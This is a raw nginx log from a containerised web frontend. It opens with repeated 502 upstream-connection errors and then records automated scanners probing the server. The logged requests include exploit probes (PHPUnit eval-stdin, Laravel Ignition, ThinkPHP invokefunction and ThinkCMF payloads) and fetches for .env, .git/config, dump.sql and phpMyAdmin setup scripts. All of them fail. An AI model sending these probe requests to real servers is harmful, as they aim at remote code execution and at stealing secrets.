frontend_1  | 2021/05/05 20:19:07 [error] 20#20: *90 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:07 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:19:07 [error] 20#20: *90 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:07 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:19:10 [error] 20#20: *90 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:10 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:19:10 [error] 20#20: *90 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:10 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:12 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:19:12 [error] 20#20: *90 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:12 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:19:12 [error] 20#20: *90 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 20:19:17 [error] 20#20: *99 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 20:19:17 [error] 20#20: *98 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:17 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:17 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:23 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:19:23 [error] 20#20: *98 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 20:19:23 [error] 20#20: *98 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:23 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:34:16 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:48:36 +0000] "GET / HTTP/1.1" 200 4970 "-" "-" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:48:37 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-"
frontend_1  | 2021/05/05 22:50:56 [error] 20#20: *108 "/frontend/app/solr/index.html" is not found (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /solr/ HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [05/May/2021:22:50:56 +0000] "GET /solr/ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:00:19:04 +0000] "GET / HTTP/1.1" 200 4970 "-" "-" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:00:19:05 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-"
frontend_1  | 2021/05/06 00:55:18 [error] 20#20: *113 open() "/frontend/app/robots.txt" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "HEAD /robots.txt HTTP/1.0"
frontend_1  | 172.18.0.1 - - [06/May/2021:00:55:18 +0000] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-" "-"
frontend_1  | 2021/05/06 02:12:41 [error] 20#20: *115 open() "/frontend/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:12:41 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 2021/05/06 02:12:42 [error] 20#20: *116 open() "/frontend/app/_ignition/execute-solution" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /_ignition/execute-solution HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:12:42 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 2021/05/06 02:12:42 [error] 20#20: *117 open() "/frontend/app/solr/admin/info/system" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /solr/admin/info/system?wt=json HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:12:42 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:12:43 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:12:44 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 2021/05/06 02:12:46 [error] 20#20: *120 open() "/frontend/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:12:47 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 2021/05/06 02:12:47 [error] 20#20: *121 open() "/frontend/app/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:12:47 +0000] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 2021/05/06 02:12:47 [error] 20#20: *122 open() "/frontend/app/Autodiscover/Autodiscover.xml" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "POST /Autodiscover/Autodiscover.xml HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:12:48 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:12:48 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 2021/05/06 02:12:48 [error] 20#20: *123 open() "/frontend/app/wp-content/plugins/wp-file-manager/readme.txt" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 2021/05/06 02:12:48 [error] 20#20: *124 "/frontend/app/console/index.html" is not found (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /console/ HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:12:48 +0000] "GET /console/ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:13:00 +0000] "POST /api/jsonws/invoke HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:27:09 +0000] "OPTIONS / RTSP/1.0" 400 150 "-" "-" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:36:29 +0000] "GET / HTTP/1.0" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:02:43:01 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 146 "-" "python-requests/2.18.4" "-"
frontend_1  | 2021/05/06 02:43:01 [error] 20#20: *127 open() "/frontend/app/_ignition/execute-solution" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /_ignition/execute-solution HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 03:56:34 [error] 20#20: *128 open() "/frontend/app/boaform/admin/formLogin" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "140.112.230.89:80", referrer: "http://140.112.230.89:80/admin/login.asp"
frontend_1  | 172.18.0.1 - - [06/May/2021:03:56:34 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 404 146 "http://140.112.230.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:03:56:34 +0000] "" 400 0 "-" "-" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:03:58:45 +0000] "\x01\x00\x00\x00" 400 150 "-" "-" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:22:27 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 zgrab/0.x" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:28:37 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
frontend_1  | 2021/05/06 04:28:37 [error] 20#20: *132 open() "/frontend/app/.env" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /.env HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:28:37 +0000] "GET /.env HTTP/1.1" 404 548 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
frontend_1  | 2021/05/06 04:28:37 [error] 20#20: *133 open() "/frontend/app/.git/config" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /.git/config HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:28:37 +0000] "GET /.git/config HTTP/1.1" 404 548 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:28:38 +0000] "GET /dump.sql HTTP/1.1" 404 548 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
frontend_1  | 2021/05/06 04:28:38 [error] 20#20: *134 open() "/frontend/app/dump.sql" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /dump.sql HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 04:32:35 [error] 20#20: *136 open() "/frontend/app/_ignition/execute-solution" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "POST /_ignition/execute-solution HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:32:35 +0000] "POST /_ignition/execute-solution HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:32:35 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-"
frontend_1  | 2021/05/06 04:32:35 [error] 20#20: *137 open() "/frontend/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:32:36 +0000] "GET /login HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-"
frontend_1  | 2021/05/06 04:32:36 [error] 20#20: *138 open() "/frontend/app/login" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /login HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 2021/05/06 04:32:36 [error] 20#20: *138 open() "/frontend/app/jenkins/login" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /jenkins/login HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:32:36 +0000] "GET /jenkins/login HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-"
frontend_1  | 172.18.0.1 - 8hYTSUFk [06/May/2021:04:32:36 +0000] "GET /manager/html HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-"
frontend_1  | 2021/05/06 04:32:36 [error] 20#20: *139 open() "/frontend/app/manager/html" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /manager/html HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 2021/05/06 04:32:37 [error] 20#20: *140 open() "/frontend/app/wp-login.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /wp-login.php HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:32:37 +0000] "GET /wp-login.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:04:32:37 +0000] "GET /?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:05:17:52 +0000] "GET / HTTP/1.0" 200 4970 "-" "-" "-"
frontend_1  | 2021/05/06 05:41:45 [error] 20#20: *143 open() "/frontend/app/w00tw00t.at.blackhats.romanian.anti-sec:)" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:05:41:45 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 146 "-" "ZmEu" "-"
frontend_1  | 2021/05/06 05:41:48 [error] 20#20: *144 open() "/frontend/app/phpmyadmin/scripts/setup.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin/scripts/setup.php HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:05:41:48 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 146 "-" "ZmEu" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:05:41:49 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 146 "-" "ZmEu" "-"
frontend_1  | 2021/05/06 05:41:49 [error] 20#20: *145 open() "/frontend/app/pma/scripts/setup.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma/scripts/setup.php HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 05:41:49 [error] 20#20: *146 open() "/frontend/app/myadmin/scripts/setup.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /myadmin/scripts/setup.php HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:05:41:49 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 146 "-" "ZmEu" "-"
frontend_1  | 2021/05/06 05:41:51 [error] 20#20: *147 open() "/frontend/app/MyAdmin/scripts/setup.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /MyAdmin/scripts/setup.php HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:05:41:51 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 146 "-" "ZmEu" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:05:45:37 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:06:21:12 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:06:45:32 +0000] "GET / HTTP/1.1" 200 4970 "-" "Linux Gnu (cow)" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:06:49:06 +0000] "GET / HTTP/1.1" 200 4970 "-" "Linux Gnu (cow)" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:06:54:09 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:33 [error] 19#19: *153 open() "/frontend/app/PMA2015/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2015/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:33 +0000] "GET /PMA2015/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:33 [error] 20#20: *155 open() "/frontend/app/phpmyadmin2018/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2018/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:33 +0000] "GET /phpmyadmin2018/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:34 +0000] "GET /php-my-admin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:34 [error] 20#20: *156 open() "/frontend/app/php-my-admin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /php-my-admin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:34 [error] 20#20: *157 open() "/frontend/app/db/db-admin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/db-admin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:34 +0000] "GET /db/db-admin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:34 [error] 20#20: *158 open() "/frontend/app/phpmy/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmy/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:34 +0000] "GET /phpmy/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:34 [error] 20#20: *159 open() "/frontend/app/phpMyAdmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:34 +0000] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:34 [error] 20#20: *160 open() "/frontend/app/phpmyadmin_/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin_/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:34 +0000] "GET /phpmyadmin_/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:34 [error] 20#20: *161 open() "/frontend/app/MyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /MyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:34 +0000] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:34 +0000] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:34 [error] 20#20: *162 open() "/frontend/app/phpMyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:34 [error] 20#20: *163 open() "/frontend/app/sql/phpmy-admin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:34 +0000] "GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:34 [error] 20#20: *164 open() "/frontend/app/phpmyadmin2014/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:34 +0000] "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:34 [error] 20#20: *165 open() "/frontend/app/PMA2020/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2020/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
